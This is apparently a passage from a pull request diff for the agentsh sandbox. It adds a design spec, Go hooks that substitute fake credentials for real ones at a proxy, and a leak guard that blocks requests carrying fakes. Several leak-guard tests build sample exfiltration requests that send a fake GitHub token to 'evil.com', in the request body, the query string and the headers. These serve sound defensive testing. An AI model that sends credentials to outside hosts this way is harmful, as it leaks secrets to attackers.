### PR TITLE
feat(secrets): session proxy wiring — fake creds, hooks, leak guard, bootstrap (Plan 5)

### DIFF
--- a/docs/superpowers/specs/2026-04-09-plan-05-session-proxy-wiring-design.md
+++ b/docs/superpowers/specs/2026-04-09-plan-05-session-proxy-wiring-design.md
@@ -1,0 +1,380 @@
+# Plan 5 Design: Session Startup + Proxy Egress Wiring
+
+**Parent spec:** `docs/superpowers/specs/2026-04-07-external-secrets-design.md`
+**Prerequisite plans:** Plans 1-4 (proxy rename, credsub.Table, SecretProvider + keyring, Vault + registry)
+
+## Goal
+
+Wire the credential substitution pipeline end-to-end: session startup fetches secrets and generates length-preserving fakes, the proxy substitutes fakes with reals on egress and scrubs reals from responses, and a leak guard blocks requests that would exfiltrate fakes to unregistered hosts.
+
+Plan 5 uses a hard-coded test service configuration (no YAML parsing). YAML config, the full service model, host-pattern matching, and cloud-specific plugins (AWS SigV4, GCP OAuth) are deferred to later plans.
+
+## Scope
+
+**In scope:**
+- Fake credential generator with format parsing and length preservation
+- `HookAbortError` type for custom HTTP status codes from hooks
+- Hook invocation wired into `proxy.ServeHTTP` (PreHook before forwarding, PostHook on response)
+- `CredsSubHook` — fake-to-real substitution on request body, real-to-fake on response body
+- `LeakGuardHook` — scan requests for known fakes, block with 403 if detected
+- Session startup: construct registry, fetch secrets, generate fakes, populate `credsub.Table`, register hooks
+- Session cleanup: zero table, close registry
+- Audit log events for leak detection and initialization
+- Buffer-then-substitute for response bodies (no streaming substitution)
+
+**Out of scope:**
+- YAML config parsing for `providers:` and `services:` sections
+- Service interface, host-pattern matching, service registry
+- AWS SigV4 and GCP OAuth plugins
+- SSE streaming substitution with chunk-boundary buffering
+- Cross-service-use detection (fake for service A in request to service B)
+- Named provider instances
+- `agentsh policy lint` rules for secrets
+
+## Section 1 — Fake Credential Generator
+
+New file: `internal/proxy/secrets/fakegen.go`
+
+### Format syntax
+
+```
+<prefix>{rand:<count>}
+```
+
+Examples:
+- `ghp_{rand:36}` — GitHub PAT format: `ghp_` prefix + 36 random base62 chars
+- `sk-{rand:48}` — OpenAI key format
+- `{rand:40}` — no prefix, 40 random chars
+
+The `{rand:N}` placeholder is always at the end. Only one placeholder per format string.
+
+### API
+
+```go
+// GenerateFake produces a fake credential matching the given format
+// template whose total length equals realLen.
+//
+// The format must parse successfully via ParseFormat. The sum of the
+// parsed prefix length and random-char count must equal realLen;
+// otherwise ErrFakeLengthMismatch is returned.
+//
+// Random characters are drawn from the base62 alphabet
+// [A-Za-z0-9] using crypto/rand.
+func GenerateFake(format string, realLen int) ([]byte, error)
+
+// ParseFormat extracts the prefix and random-char count from a
+// format template string. Returns ErrInvalidFakeFormat if the
+// template is malformed.
+func ParseFormat(format string) (prefix string, randLen int, err error)
+```
+
+### Invariants
+
+- **Length preservation:** `len(prefix) + randLen` must equal `realLen`. This is the fundamental invariant that enables future Mechanism B (eBPF in-place rewrite).
+- **Minimum entropy:** `randLen` must be >= 24. Formats with fewer random chars are rejected with `ErrFakeEntropyTooLow`.
+- **Cryptographic randomness:** Uses `crypto/rand`, not `math/rand`.
+
+### Error types
+
+```go
+var ErrInvalidFakeFormat  = errors.New("secrets: invalid fake format template")
+var ErrFakeLengthMismatch = errors.New("secrets: fake format length does not match real secret length")
+var ErrFakeEntropyTooLow  = errors.New("secrets: fake format has fewer than 24 random characters")
+```
+
+### Collision handling
+
+The caller (session startup) is responsible for collision detection. If `credsub.Table.Add` returns `ErrFakeCollision`, the caller regenerates the fake once. If the second attempt also collides, session creation fails.
+
+## Section 2 — HookAbortError
+
+Extend `internal/proxy/hooks.go` with a typed error that hooks can return to abort a request with a specific HTTP status code:
+
+```go
+// HookAbortError is returned by PreHook to abort a request with a
+// specific HTTP status code. Any other error from PreHook results
+// in a 502 Bad Gateway.
+type HookAbortError struct {
+    StatusCode int
+    Message    string
+}
+
+func (e *HookAbortError) Error() string {
+    return fmt.Sprintf("hook abort %d: %s", e.StatusCode, e.Message)
+}
+```
+
+In `ServeHTTP`, when `ApplyPreHooks` returns an error:
+- If the error is `*HookAbortError`, respond with its `StatusCode` and `Message`
+- Otherwise, respond with 502 Bad Gateway
+
+## Section 3 — Hook Invocation in Proxy
+
+The `Hook` interface and `Registry` exist in `hooks.go` but are not currently called from `proxy.go`. Plan 5 wires them in.
+
+### Proxy struct changes
+
+Add a `hookRegistry` field to the `Proxy` struct:
+
+```go
+type Proxy struct {
+    // ... existing fields ...
+    hookRegistry *Registry
+}
+```
+
+Initialize in `proxy.New()` with an empty registry. Expose `HookRegistry() *Registry` for callers to register hooks.
+
+### Request flow insertion points
+
+**PreHook** — after DLP processing, before request rewrite and logging:
+
+```
+Body read → DLP → PreHooks (LeakGuard, CredsSubHook) → Rewrite → Log → Forward
+```
+
+The proxy reads the body (existing line 333), applies DLP (line 342), then calls `hookRegistry.ApplyPreHooks("", req, requestCtx)`. If a hook error is returned, the proxy responds to the agent immediately (403 for `HookAbortError`, 502 otherwise) and does not forward the request.
+
+After PreHooks run, the request body may have been replaced by `CredsSubHook` (fakes replaced with reals). The rewriter and logger see the post-substitution body.
+
+**PostHook** — after reading response body, before MCP interception and logging:
+
+```
+Response body read → PostHooks (CredsSubHook scrubs reals) → MCP interception → Log → Return to agent
+```
+
+In `ModifyResponse`, after reading the upstream response body (existing line 402), call `hookRegistry.ApplyPostHooks("", resp, requestCtx)`. The hook may replace the response body (reals replaced with fakes). MCP interception and logging see the post-scrub body.
+
+### RequestContext population
+
+Before calling hooks, populate the `RequestContext`:
+
+```go
+reqCtx := &RequestContext{
+    RequestID:   requestID,
+    SessionID:   sessionID,
+    ServiceName: "",  // no service matching in Plan 5
+    StartTime:   startTime,
+    Attrs:       make(map[string]any),
+}
+```
+
+The `RequestContext` is passed through to both Pre and PostHooks. Store it in `r.Context()` via `context.WithValue` so `ModifyResponse` can access it (the `httputil.ReverseProxy` callback doesn't receive extra arguments).
+
+## Section 4 — CredsSubHook
+
+New file: `internal/proxy/credshook.go`
+
+### CredsSubHook
+
+```go
+// CredsSubHook performs credential substitution using a credsub.Table.
+// PreHook replaces fake credentials with real ones in the request body.
+// PostHook replaces real credentials with fakes in the response body.
+type CredsSubHook struct {
+    table *credsub.Table
+}
+```
+
+**PreHook behavior:**
+1. Read `r.Body` into `[]byte`
+2. Call `table.ReplaceFakeToReal(body)` — returns substituted body (same length)
+3. Replace `r.Body` with new reader, update `r.ContentLength`
+
+**PostHook behavior:**
+1. Read `resp.Body` into `[]byte`
+2. Call `table.ReplaceRealToFake(body)` — returns scrubbed body (same length)
+3. Replace `resp.Body` with new reader, update `resp.ContentLength`
+
+Both operations are infallible — if no fakes/reals are found, the body is returned unchanged.
+
+### LeakGuardHook
+
+```go
+// LeakGuardHook blocks requests that contain known fake credentials.
+// This prevents credential exfiltration to unregistered hosts.
+type LeakGuardHook struct {
+    table  *credsub.Table
+    logger *slog.Logger
+}
+```
+
+**PreHook behavior:**
+1. Read `r.Body` into `[]byte` (put it back afterward)
+2. Scan body for any known fake: iterate table entries, check if `bytes.Contains(body, entry.Fake)`
+3. Also scan `r.URL.RawQuery` and select headers (`Authorization`, `X-Api-Key`, etc.)
+4. If fake found: log audit event `secret_leak_blocked` with service name, request host, request ID
+5. Return `&HookAbortError{StatusCode: 403, Message: "credential leak blocked"}`
+6. If no fake found: return nil (request proceeds)
+
+**PostHook:** No-op (returns nil).
+
+### Registration order
+
+LeakGuardHook is registered first, CredsSubHook second. The hook registry dispatches PreHooks in registration order, so leak detection runs before substitution.
+
+This ordering is correct because:
+- LeakGuard needs to see fakes in the body (before they're replaced)
+- CredsSubHook needs to run after LeakGuard has cleared the request
+
+### Body re-reading
+
+Both hooks need to read `r.Body`. Since `r.Body` is an `io.ReadCloser` that can only be read once, each hook must:
+1. Read the body
+2. Process it
+3. Replace `r.Body` with a new `bytes.NewReader`
+
+This is the same pattern already used in `ServeHTTP` (line 346).
+
+## Section 5 — Session Startup Integration
+
+### ServiceConfig type
+
+New file: `internal/session/secrets.go`
+
+```go
+// ServiceConfig describes one secret-backed service for credential
+// substitution. Plan 5 uses this struct directly; future plans will
+// parse it from YAML policy files.
+type ServiceConfig struct {
+    Name       string             // logical service name (e.g. "github")
+    SecretRef  secrets.SecretRef   // where to fetch the real credential
+    FakeFormat string             // fake template (e.g. "ghp_{rand:36}")
+}
+```
+
+### Bootstrap function
+
+```go
+// BootstrapCredentials fetches secrets, generates fakes, and
+// populates a credsub.Table. Returns the table and a cleanup
+// function that zeros the table and closes the registry.
+//
+// If any fetch or fake generation fails, all already-fetched
+// secrets are zeroed and the registry is closed before returning
+// the error. The agent never starts with a partially populated
+// table.
+func BootstrapCredentials(
+    ctx context.Context,
+    registry *secrets.Registry,
+    services []ServiceConfig,
+) (*credsub.Table, func() error, error)
+```
+
+**Steps:**
+1. Create `credsub.New()` table
+2. For each service in `services`:
+   a. `registry.Fetch(ctx, svc.SecretRef)` → get `SecretValue`
+   b. `secrets.GenerateFake(svc.FakeFormat, len(sv.Value))` → generate fake
+   c. `table.Add(svc.Name, fake, sv.Value)` → populate table
+   d. If `table.Add` returns `ErrFakeCollision`, regenerate fake once. If second attempt collides, fail.
+   e. `sv.Zero()` — wipe fetched secret from memory (table has its own copy)
+3. If any step fails: `table.Zero()`, `registry.Close()`, return error
+4. Return table + cleanup function (returns error from `registry.Close()`) that calls `table.Zero()` then `registry.Close()`
+
+### Session struct changes
+
+Add to `Session` in `internal/session/manager.go`:
+
+```go
+credsTable    *credsub.Table   // per-session credential table; nil if no secrets configured
+secretsClose  func() error     // closes secrets registry; nil if no secrets
+```
+
+Add accessor methods:
+```go
+func (s *Session) CredsTable() *credsub.Table
+func (s *Session) SetCredsTable(t *credsub.Table, closeFn func() error)
+```
+
+### LLM proxy startup extension
+
+In `internal/session/llmproxy.go`, after the proxy is created and before storing it on the session:
+
+1. If service configs are provided (non-empty):
+   a. Call `BootstrapCredentials(ctx, registry, services)`
+   b. Create `LeakGuardHook` and `CredsSubHook` with the returned table
+   c. Register both on `proxy.HookRegistry()`
+   d. Store table and cleanup on session via `SetCredsTable`
+2. If no service configs: skip (backward compatible — existing sessions without secrets work unchanged)
+
+### Cleanup
+
+In `CloseLLMProxy()` (or session close path):
+1. If `secretsClose != nil`: call it (zeros table, closes registry)
+2. Nil out `credsTable` and `secretsClose`
+
+## Section 6 — Failure Semantics
+
+### Session startup failures (agent never starts)
+
+Per the parent spec: "any step 1-7 failure aborts session creation with a structured error. The agent never starts. Partial success is not allowed."
+
+| Failure | Error | Effect |
+|---------|-------|--------|
+| Registry construction fails | Provider-specific error | Session creation fails |
+| Secret fetch fails (not found, auth, timeout) | `ErrSecretFetchFailed` wrapping provider error | Session creation fails; table zeroed, registry closed |
+| Fake format invalid | `ErrInvalidFakeFormat` | Session creation fails |
+| Fake length mismatch | `ErrFakeLengthMismatch` | Session creation fails |
+| Fake entropy too low | `ErrFakeEntropyTooLow` | Session creation fails |
+| Table collision (after retry) | `ErrFakeCollision` | Session creation fails |
+
+### Runtime failures (during proxy operation)
+
+| Failure | Effect |
+|---------|--------|
+| LeakGuard detects fake in request | 403 to agent + audit log `secret_leak_blocked` |
+| CredsSubHook substitution | Infallible — body unchanged if no fakes found |
+| Response scrubbing | Infallible — body unchanged if no reals found |
+
+### Audit events
+
+Logged via `slog.Logger` (structured logging, not stored in audit DB):
+
+- `secrets_initialized` — emitted on successful bootstrap. Fields: `service_count`, `session_id`
+- `secret_leak_blocked` — emitted when LeakGuardHook blocks a request. Fields: `session_id`, `request_id`, `service_name` (which service's fake was detected), `request_host`
+
+## Section 7 — File Layout
+
+```
+internal/proxy/secrets/
+  fakegen.go            # NEW: GenerateFake, ParseFormat, format errors
+  fakegen_test.go       # NEW
+
+internal/proxy/
+  hooks.go              # MODIFY: add HookAbortError
+  hooks_test.go         # MODIFY: add HookAbortError tests
+  proxy.go              # MODIFY: add hookRegistry field, wire PreHook/PostHook calls
+  credshook.go          # NEW: CredsSubHook, LeakGuardHook
+  credshook_test.go     # NEW
+
+internal/session/
+  manager.go            # MODIFY: add credsTable, secretsClose fields + accessors
+  llmproxy.go           # MODIFY: extend startup to bootstrap credentials + register hooks
+  secrets.go            # NEW: ServiceConfig, BootstrapCredentials
+  secrets_test.go       # NEW
+```
+
+No new packages. All changes fit within existing package boundaries.
+
+## Section 8 — Testing Strategy
+
+### Unit tests
+
+- **fakegen_test.go:** Format parsing (valid, invalid, edge cases). Length enforcement. Entropy minimum. Cryptographic randomness (output length, charset). Multiple calls produce different output.
+- **credshook_test.go:** CredsSubHook substitution on request body (fake→real). CredsSubHook scrubbing on response body (real→fake). LeakGuardHook detection in body, URL, headers. LeakGuardHook returns 403 via HookAbortError. No false positives (request without fakes passes). Hook ordering (leak guard before substitution).
+- **hooks_test.go:** HookAbortError propagation — PreHook returning HookAbortError → caller gets status code. PreHook returning plain error → 502.
+- **secrets_test.go:** BootstrapCredentials with MemoryProvider. Failure modes: fetch error, format error, collision. Cleanup on failure (table zeroed, registry closed). Successful bootstrap populates table correctly.
+
+### Integration test
+
+- httptest server as "upstream"
+- Proxy with hooks registered via BootstrapCredentials
+- Send request containing fake → verify upstream receives real
+- Upstream responds containing real → verify agent receives fake
+- Send request with fake to wrong path → verify 403 (leak guard)
+
+## Section 9 — Deferred to Later Plans
+
+- **Plan 6 (likely):** YAML config parsing for `providers:` and `services:` sections. Full `Service` interface with host-pattern matching. Service registry.
+- **Plan 7+:** AWS SigV4 plugin, GCP OAuth plugin. SSE streaming substitution. Cross-service-use detection. `agentsh policy lint` rules.

--- a/internal/api/app.go
+++ b/internal/api/app.go
@@ -471,6 +471,7 @@ func (a *App) startLLMProxy(ctx context.Context, s *session.Session) {
 		a.cfg.Sandbox.MCP,
 		storagePath,
 		slog.Default(),
+		nil, nil,
 	)
 	if err != nil {
 		fail := types.Event{

--- a/internal/proxy/credshook.go
+++ b/internal/proxy/credshook.go
@@ -97,9 +97,9 @@ func (h *LeakGuardHook) PreHook(r *http.Request, ctx *RequestContext) error {
 		}
 	}
 
-	// Scan select headers.
+	// Scan select headers (all values, not just the first).
 	for _, hdr := range scanHeaders {
-		if val := r.Header.Get(hdr); val != "" {
+		for _, val := range r.Header.Values(hdr) {
 			if serviceName, found := h.table.ContainsFake([]byte(val)); found {
 				h.logLeak(ctx, serviceName, r.Host)
 				return &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}

--- a/internal/proxy/credshook.go
+++ b/internal/proxy/credshook.go
@@ -3,6 +3,7 @@ package proxy
 import (
 	"bytes"
 	"io"
+	"log/slog"
 	"net/http"
 
 	"github.com/agentsh/agentsh/internal/proxy/credsub"
@@ -52,4 +53,72 @@ func (h *CredsSubHook) PostHook(resp *http.Response, _ *RequestContext) error {
 	resp.Body = io.NopCloser(bytes.NewReader(replaced))
 	resp.ContentLength = int64(len(replaced))
 	return nil
+}
+
+// scanHeaders lists HTTP headers that LeakGuardHook scans for fakes.
+var scanHeaders = []string{
+	"Authorization",
+	"X-Api-Key",
+	"Api-Key",
+	"X-Auth-Token",
+}
+
+// LeakGuardHook blocks requests that contain known fake credentials.
+type LeakGuardHook struct {
+	table  *credsub.Table
+	logger *slog.Logger
+}
+
+// NewLeakGuardHook returns a LeakGuardHook that scans for fakes.
+func NewLeakGuardHook(table *credsub.Table, logger *slog.Logger) *LeakGuardHook {
+	return &LeakGuardHook{table: table, logger: logger}
+}
+
+func (h *LeakGuardHook) Name() string { return "leak-guard" }
+
+func (h *LeakGuardHook) PreHook(r *http.Request, ctx *RequestContext) error {
+	// Scan request body.
+	if r.Body != nil {
+		body, err := io.ReadAll(r.Body)
+		if err == nil {
+			r.Body = io.NopCloser(bytes.NewReader(body))
+			if serviceName, found := h.table.ContainsFake(body); found {
+				h.logLeak(ctx, serviceName, r.Host)
+				return &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}
+			}
+		}
+	}
+
+	// Scan URL query string.
+	if rawQuery := r.URL.RawQuery; rawQuery != "" {
+		if serviceName, found := h.table.ContainsFake([]byte(rawQuery)); found {
+			h.logLeak(ctx, serviceName, r.Host)
+			return &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}
+		}
+	}
+
+	// Scan select headers.
+	for _, hdr := range scanHeaders {
+		if val := r.Header.Get(hdr); val != "" {
+			if serviceName, found := h.table.ContainsFake([]byte(val)); found {
+				h.logLeak(ctx, serviceName, r.Host)
+				return &HookAbortError{StatusCode: 403, Message: "credential leak blocked"}
+			}
+		}
+	}
+
+	return nil
+}
+
+func (h *LeakGuardHook) PostHook(_ *http.Response, _ *RequestContext) error {
+	return nil
+}
+
+func (h *LeakGuardHook) logLeak(ctx *RequestContext, serviceName, requestHost string) {
+	h.logger.Warn("secret_leak_blocked",
+		"session_id", ctx.SessionID,
+		"request_id", ctx.RequestID,
+		"service_name", serviceName,
+		"request_host", requestHost,
+	)
 }

--- a/internal/proxy/credshook.go
+++ b/internal/proxy/credshook.go
@@ -1,0 +1,55 @@
+package proxy
+
+import (
+	"bytes"
+	"io"
+	"net/http"
+
+	"github.com/agentsh/agentsh/internal/proxy/credsub"
+)
+
+// CredsSubHook performs credential substitution using a credsub.Table.
+// PreHook replaces fake credentials with real ones in request bodies.
+// PostHook replaces real credentials with fakes in response bodies.
+type CredsSubHook struct {
+	table *credsub.Table
+}
+
+// NewCredsSubHook returns a CredsSubHook that uses the given table.
+func NewCredsSubHook(table *credsub.Table) *CredsSubHook {
+	return &CredsSubHook{table: table}
+}
+
+func (h *CredsSubHook) Name() string { return "creds-sub" }
+
+// PreHook replaces fake credentials with real ones in the request body.
+func (h *CredsSubHook) PreHook(r *http.Request, _ *RequestContext) error {
+	if r.Body == nil {
+		return nil
+	}
+	body, err := io.ReadAll(r.Body)
+	if err != nil {
+		return nil // best-effort
+	}
+
+	replaced := h.table.ReplaceFakeToReal(body)
+	r.Body = io.NopCloser(bytes.NewReader(replaced))
+	r.ContentLength = int64(len(replaced))
+	return nil
+}
+
+// PostHook replaces real credentials with fakes in the response body.
+func (h *CredsSubHook) PostHook(resp *http.Response, _ *RequestContext) error {
+	if resp.Body == nil {
+		return nil
+	}
+	body, err := io.ReadAll(resp.Body)
+	if err != nil {
+		return nil // best-effort
+	}
+
+	replaced := h.table.ReplaceRealToFake(body)
+	resp.Body = io.NopCloser(bytes.NewReader(replaced))
+	resp.ContentLength = int64(len(replaced))
+	return nil
+}

--- a/internal/proxy/credshook_test.go
+++ b/internal/proxy/credshook_test.go
@@ -1,0 +1,113 @@
+package proxy
+
+import (
+	"bytes"
+	"io"
+	"net/http"
+	"net/http/httptest"
+	"testing"
+
+	"github.com/agentsh/agentsh/internal/proxy/credsub"
+)
+
+func newTestTable(t *testing.T) *credsub.Table {
+	t.Helper()
+	tbl := credsub.New()
+	// 24-char fakes/reals (minimum entropy length)
+	if err := tbl.Add("github",
+		[]byte("ghp_FAKE1234567890abcdef"),
+		[]byte("ghp_REAL1234567890abcdef"),
+	); err != nil {
+		t.Fatal(err)
+	}
+	return tbl
+}
+
+func TestCredsSubHook_Name(t *testing.T) {
+	h := NewCredsSubHook(credsub.New())
+	if h.Name() != "creds-sub" {
+		t.Errorf("Name() = %q, want %q", h.Name(), "creds-sub")
+	}
+}
+
+func TestCredsSubHook_PreHook_ReplacesFakeToReal(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewCredsSubHook(tbl)
+
+	body := []byte(`{"token":"ghp_FAKE1234567890abcdef"}`)
+	req := httptest.NewRequest(http.MethodPost, "http://api.example.com/v1/test", bytes.NewReader(body))
+	req.ContentLength = int64(len(body))
+
+	err := h.PreHook(req, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PreHook returned error: %v", err)
+	}
+
+	got, _ := io.ReadAll(req.Body)
+	want := []byte(`{"token":"ghp_REAL1234567890abcdef"}`)
+	if !bytes.Equal(got, want) {
+		t.Errorf("body after PreHook:\n  got:  %s\n  want: %s", got, want)
+	}
+	if req.ContentLength != int64(len(want)) {
+		t.Errorf("ContentLength = %d, want %d", req.ContentLength, len(want))
+	}
+}
+
+func TestCredsSubHook_PostHook_ReplacesRealToFake(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewCredsSubHook(tbl)
+
+	body := []byte(`{"echoed":"ghp_REAL1234567890abcdef"}`)
+	resp := &http.Response{
+		StatusCode:    200,
+		Body:          io.NopCloser(bytes.NewReader(body)),
+		ContentLength: int64(len(body)),
+	}
+
+	err := h.PostHook(resp, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PostHook returned error: %v", err)
+	}
+
+	got, _ := io.ReadAll(resp.Body)
+	want := []byte(`{"echoed":"ghp_FAKE1234567890abcdef"}`)
+	if !bytes.Equal(got, want) {
+		t.Errorf("body after PostHook:\n  got:  %s\n  want: %s", got, want)
+	}
+	if resp.ContentLength != int64(len(want)) {
+		t.Errorf("ContentLength = %d, want %d", resp.ContentLength, len(want))
+	}
+}
+
+func TestCredsSubHook_PreHook_NoFakes_BodyUnchanged(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewCredsSubHook(tbl)
+
+	body := []byte(`{"query":"hello world"}`)
+	req := httptest.NewRequest(http.MethodPost, "http://api.example.com/v1/test", bytes.NewReader(body))
+
+	err := h.PreHook(req, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PreHook returned error: %v", err)
+	}
+
+	got, _ := io.ReadAll(req.Body)
+	if !bytes.Equal(got, body) {
+		t.Errorf("body should be unchanged, got: %s", got)
+	}
+}
+
+func TestCredsSubHook_NilBody(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewCredsSubHook(tbl)
+
+	req := httptest.NewRequest(http.MethodGet, "http://api.example.com/", nil)
+	if err := h.PreHook(req, &RequestContext{}); err != nil {
+		t.Fatalf("PreHook with nil body returned error: %v", err)
+	}
+
+	resp := &http.Response{StatusCode: 200, Body: nil}
+	if err := h.PostHook(resp, &RequestContext{}); err != nil {
+		t.Fatalf("PostHook with nil body returned error: %v", err)
+	}
+}

--- a/internal/proxy/credshook_test.go
+++ b/internal/proxy/credshook_test.go
@@ -240,3 +240,26 @@ func TestLeakGuardHook_PostHook_IsNoOp(t *testing.T) {
 		t.Fatalf("PostHook should be no-op, got: %v", err)
 	}
 }
+
+func TestLeakGuardHook_DuplicateHeaders_Returns403(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	req := httptest.NewRequest(http.MethodPost, "http://evil.com/api", nil)
+	// First header value is clean, second contains the fake.
+	req.Header.Set("Authorization", "Bearer clean-token-here!!!!!")
+	req.Header.Add("Authorization", "Bearer ghp_FAKE1234567890abcdef")
+
+	err := h.PreHook(req, &RequestContext{RequestID: "r1", SessionID: "s1"})
+	if err == nil {
+		t.Fatal("expected error — fake is in second Authorization header value")
+	}
+
+	var abortErr *HookAbortError
+	if !errors.As(err, &abortErr) {
+		t.Fatalf("expected HookAbortError, got: %T", err)
+	}
+	if abortErr.StatusCode != 403 {
+		t.Errorf("StatusCode = %d, want 403", abortErr.StatusCode)
+	}
+}

--- a/internal/proxy/credshook_test.go
+++ b/internal/proxy/credshook_test.go
@@ -2,7 +2,9 @@ package proxy
 
 import (
 	"bytes"
+	"errors"
 	"io"
+	"log/slog"
 	"net/http"
 	"net/http/httptest"
 	"testing"
@@ -109,5 +111,132 @@ func TestCredsSubHook_NilBody(t *testing.T) {
 	resp := &http.Response{StatusCode: 200, Body: nil}
 	if err := h.PostHook(resp, &RequestContext{}); err != nil {
 		t.Fatalf("PostHook with nil body returned error: %v", err)
+	}
+}
+
+func TestLeakGuardHook_Name(t *testing.T) {
+	h := NewLeakGuardHook(credsub.New(), slog.Default())
+	if h.Name() != "leak-guard" {
+		t.Errorf("Name() = %q, want %q", h.Name(), "leak-guard")
+	}
+}
+
+func TestLeakGuardHook_FakeInBody_Returns403(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	body := []byte(`{"token":"ghp_FAKE1234567890abcdef"}`)
+	req := httptest.NewRequest(http.MethodPost, "http://evil.com/exfil", bytes.NewReader(body))
+
+	err := h.PreHook(req, &RequestContext{RequestID: "r1", SessionID: "s1"})
+	if err == nil {
+		t.Fatal("expected error from LeakGuardHook")
+	}
+
+	var abortErr *HookAbortError
+	if !errors.As(err, &abortErr) {
+		t.Fatalf("expected HookAbortError, got: %T", err)
+	}
+	if abortErr.StatusCode != 403 {
+		t.Errorf("StatusCode = %d, want 403", abortErr.StatusCode)
+	}
+}
+
+func TestLeakGuardHook_FakeInQuery_Returns403(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	req := httptest.NewRequest(http.MethodGet, "http://evil.com/api?key=ghp_FAKE1234567890abcdef", nil)
+
+	err := h.PreHook(req, &RequestContext{RequestID: "r1", SessionID: "s1"})
+	if err == nil {
+		t.Fatal("expected error from LeakGuardHook")
+	}
+
+	var abortErr *HookAbortError
+	if !errors.As(err, &abortErr) {
+		t.Fatalf("expected HookAbortError, got: %T", err)
+	}
+	if abortErr.StatusCode != 403 {
+		t.Errorf("StatusCode = %d, want 403", abortErr.StatusCode)
+	}
+}
+
+func TestLeakGuardHook_FakeInAuthHeader_Returns403(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	req := httptest.NewRequest(http.MethodPost, "http://evil.com/api", nil)
+	req.Header.Set("Authorization", "Bearer ghp_FAKE1234567890abcdef")
+
+	err := h.PreHook(req, &RequestContext{RequestID: "r1", SessionID: "s1"})
+	if err == nil {
+		t.Fatal("expected error from LeakGuardHook")
+	}
+
+	var abortErr *HookAbortError
+	if !errors.As(err, &abortErr) {
+		t.Fatalf("expected HookAbortError, got: %T", err)
+	}
+}
+
+func TestLeakGuardHook_FakeInXApiKeyHeader_Returns403(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	req := httptest.NewRequest(http.MethodPost, "http://evil.com/api", nil)
+	req.Header.Set("X-Api-Key", "ghp_FAKE1234567890abcdef")
+
+	err := h.PreHook(req, &RequestContext{RequestID: "r1", SessionID: "s1"})
+	if err == nil {
+		t.Fatal("expected error from LeakGuardHook")
+	}
+
+	var abortErr *HookAbortError
+	if !errors.As(err, &abortErr) {
+		t.Fatalf("expected HookAbortError, got: %T", err)
+	}
+}
+
+func TestLeakGuardHook_NoFakes_Passes(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	body := []byte(`{"message":"hello world, no secrets here"}`)
+	req := httptest.NewRequest(http.MethodPost, "http://api.github.com/v1/repos", bytes.NewReader(body))
+
+	err := h.PreHook(req, &RequestContext{RequestID: "r1", SessionID: "s1"})
+	if err != nil {
+		t.Fatalf("LeakGuardHook should pass clean requests, got: %v", err)
+	}
+
+	// Body should still be readable after check.
+	got, _ := io.ReadAll(req.Body)
+	if !bytes.Equal(got, body) {
+		t.Errorf("body was corrupted after LeakGuardHook")
+	}
+}
+
+func TestLeakGuardHook_EmptyTable_Passes(t *testing.T) {
+	tbl := credsub.New()
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	body := []byte(`{"token":"ghp_FAKE1234567890abcdef"}`)
+	req := httptest.NewRequest(http.MethodPost, "http://evil.com/exfil", bytes.NewReader(body))
+
+	err := h.PreHook(req, &RequestContext{RequestID: "r1", SessionID: "s1"})
+	if err != nil {
+		t.Fatalf("empty table should pass all requests, got: %v", err)
+	}
+}
+
+func TestLeakGuardHook_PostHook_IsNoOp(t *testing.T) {
+	tbl := newTestTable(t)
+	h := NewLeakGuardHook(tbl, slog.Default())
+
+	resp := &http.Response{StatusCode: 200, Body: nil}
+	err := h.PostHook(resp, &RequestContext{})
+	if err != nil {
+		t.Fatalf("PostHook should be no-op, got: %v", err)
 	}
 }

--- a/internal/proxy/credsub/table.go
+++ b/internal/proxy/credsub/table.go
@@ -151,6 +151,39 @@ func (t *Table) Contains(fake []byte) (Entry, bool) {
 	return Entry{}, false
 }
 
+// ContainsFake scans data for any registered fake as a substring.
+// Unlike Contains (which requires an exact match), ContainsFake
+// uses bytes.Contains to detect fakes embedded in larger payloads
+// such as JSON request bodies.
+//
+// Returns the first matching entry (deep-copied) and true if a fake
+// is found; returns a zero Entry and false otherwise. When multiple
+// entries match, the first one registered wins.
+func (t *Table) ContainsFake(data []byte) (Entry, bool) {
+	if len(data) == 0 {
+		return Entry{}, false
+	}
+
+	t.mu.RLock()
+	defer t.mu.RUnlock()
+
+	for _, e := range t.entries {
+		if bytes.Contains(data, e.Fake) {
+			fakeCopy := make([]byte, len(e.Fake))
+			copy(fakeCopy, e.Fake)
+			realCopy := make([]byte, len(e.Real))
+			copy(realCopy, e.Real)
+			return Entry{
+				ServiceName: e.ServiceName,
+				Fake:        fakeCopy,
+				Real:        realCopy,
+				AddedAt:     e.AddedAt,
+			}, true
+		}
+	}
+	return Entry{}, false
+}
+
 // ReplaceFakeToReal returns a copy of body with every occurrence of
 // every registered fake replaced by its matching real. If body
 // contains no registered fake, the original slice is returned

--- a/internal/proxy/credsub/table.go
+++ b/internal/proxy/credsub/table.go
@@ -156,12 +156,16 @@ func (t *Table) Contains(fake []byte) (Entry, bool) {
 // uses bytes.Contains to detect fakes embedded in larger payloads
 // such as JSON request bodies.
 //
-// Returns the first matching entry (deep-copied) and true if a fake
-// is found; returns a zero Entry and false otherwise. When multiple
-// entries match, the first one registered wins.
-func (t *Table) ContainsFake(data []byte) (Entry, bool) {
+// Returns the service name of the first matching entry and true if a
+// fake is found; returns "" and false otherwise. When multiple entries
+// match, the first one registered wins.
+//
+// Only the service name is returned so that callers never receive a
+// copy of the Real credential bytes, which Zero() would be unable to
